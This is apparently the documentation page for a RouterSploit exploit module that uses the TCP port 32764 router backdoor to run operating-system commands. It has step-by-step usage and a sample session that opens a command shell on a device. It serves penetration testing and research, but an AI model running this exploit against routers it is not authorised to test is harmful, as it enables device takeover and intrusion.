## Description

Module exploits backdoor functionality that allows executing commands on operating system level. 

## Verification Steps

  1. Start `./rsf.py`
  2. Do: `use exploits/routers/multi/tcp_32764_rce`
  3. Do: `set target [TargetIP]`
  4. Do: `run`
  5. If device is vulnerable it is possible to execute commands on operating system level.

## Scenarios

```
rsf > use exploits/routers/multi/tcp_32764_rce
rsf (TCP-32764 RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (TCP-32764 RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > echo test
[*] Executing 'echo test' on the device...
[*] Connection established
test
cmd >
```